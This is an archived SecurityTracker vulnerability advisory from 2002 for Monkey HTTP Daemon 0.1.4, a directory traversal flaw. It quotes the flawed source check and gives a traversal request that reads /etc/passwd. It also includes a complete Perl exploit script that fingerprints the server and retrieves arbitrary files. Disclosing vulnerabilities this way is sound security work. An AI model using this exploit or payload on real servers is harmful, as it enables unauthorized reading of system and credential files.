Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Monkey HTTP Daemon Discloses Files on the System to Remote Users
|
|
SecurityTracker Alert ID: 1005293 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 26 2002
|
Impact: Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): 0.1.4
|
Description: An information disclosure vulnerability was reported in the Monkey HTTP Daemon. A remote user can view files located outside of the web server document directory.
Illegal Instruction Labs warned that a remote user can supply a specially crafted URL containing the '../' directory traversal string
to view files located outside of the SERVER_ROOT directory that are readable by the web server process.
According to the report,
if the request is for the root directory ('/') or if the second character of the request is a period ('.'), then the path will be
set to SERVER_ROOT. So, a remote user must craft the following type of request to exploit the flaw:
GET //../../../../../../../../../etc/passwd
HTTP/1.0
Some demonstration exploit code is provided in the Source Message.
|
Impact: A remote user can view files located outside of the web server document directory that are readable by the web server process.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: monkeyd.sourceforge.net/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: DownBload <downbload@hotmail.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: 25 Sep 2002 09:10:45 -0000
From: DownBload <downbload@hotmail.com>
Subject: IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4)
|
[ Illegal Instruction Labs Advisory ]
[-------------------------------------------------------------------------]
Advisory name: Reverse traversal vulnerability in Monkey (0.1.4) HTTP
server
Advisory number: 12
Application: Monkey (0.1.4) HTTP server
Application author: Eduardo Silva
(EdsipeR)
Author e-mail: edsiper@linux-chile.org
Monkey Project: http://monkeyd.sourceforge.net
Date: 06.09.2002
Impact: Attacker can read files out of SERVER_ROOT directory
Tested on: Debian 2.1 (2.0.36 kernel)
Discovered by: DownBload
Mail me @: downbload@hotmail.com
======[ Overview
Monkey is very simple and fast HTTP server (daemon).
Monkey supports HEAD & GET methods, multiple connections, 100 MIME types.
======[ Problem
Monkey doesn't check HTTP request for ../ string, and because of that,
attacker can view any file out of SERVER_ROOT directory which Monkey can
read (if Monkey is running under root account, attacker can read any file
on that machine).
There is still one thing which will make attack a little more "complicate":
- src/method.c
...
if((strcmp(aux_request,"/"))==0 || aux_request[1]=='.' ) {
snprintf(filename,255,"%s",SERVER_ROOT);
...
Translated to (poor:) english:
If our request is / or second char of our request is . , than path will be
set to SERVER_ROOT, and in that case, we can't go out of SERVER_ROOT
directory.
Previous "if" will prevent simple reverse traversal attack like this one:
---cut here---
GET /../../../../../../../../../etc/passwd HTTP/1.0
---cut here---
But can't prevent this reverse traversal attack:
---cut here---
GET //../../../../../../../../../etc/passwd HTTP/1.0
---cut here---
======[ Exploit
---cut here---
#!/usr/bin/perl
# (0 day;) Monkey-0.1.4 reverse traversal exploit
# Usage:
# perl monkey.pl <hostname> <httpport> <file>
# <hostname> - target host
# <httpport> - port on which HTTP daemon is listening
# <file> - file which you wanna get
# Example:
# perl monkey.pl www.ii-labs.org 80 /etc/passwd
#
# by DownBload <downbload@hotmail.com>
# Illegal Instruction Labs
use IO::Socket;
sub sock () {
$SOCK = IO::Socket::INET->new (PeerAddr => $host,
PeerPort => $port,
Proto => "tcp")
|| die "[ ERROR: Can't connect to $host!!! ]\n\n";
}
sub banner() {
print "[--------------------------------------------------]\n";
print "[ Monkey-0.1.4 reverse traversal exploit ]\n";
print "[ by DownBload <downbload\@hotmail.com> ]\n";
print "[ Illegal Instruction Labs ]\n";
print "[--------------------------------------------------]\n";
}
if ($#ARGV != 2)
{
banner();
print "[ Usage: ]\n";
print "[ perl monkey.pl <hostname> <httpport> <file> ]\n";
print "[--------------------------------------------------]\n";
exit(0);
}
$host = $ARGV[0];
$port = $ARGV[1];
$file = $ARGV[2];
banner();
print "[ Connecting to $host... ]\n";
sock();
print "[ Sending probe... ]\n";
print $SOCK "HEAD / HTTP/1.0\n\n";
while ($a = <$SOCK>) { $line = $line . $a; }
if ($line =~ /Monkey/) { print "[ Monkey HTTP server found,
continuing... ]\n"; }
else { die "[ SORRY: That's not Monkey HTTP server :( ]\n\n"; }
close ($SOCK);
print "[ Connecting to $host... ]\n";
sock();
print "[ Sending GET request... ]\n";
print $SOCK "GET //../../../../../../../../../$file HTTP/1.0\n\n";
print "[ Waiting for response... ]\n\n";
while ($line = <$SOCK>) { print $line; }
close ($SOCK);
---cut here---
======[ Greetz
Greetz goes to #hr.hackers, #ii-labs and #linux <irc.carnet.hr>.
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis,
Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org
(NetZero & Paradox). I'm very sorry if I forgot someone.
|
|
Go to the Top of This SecurityTracker Archive Page
|
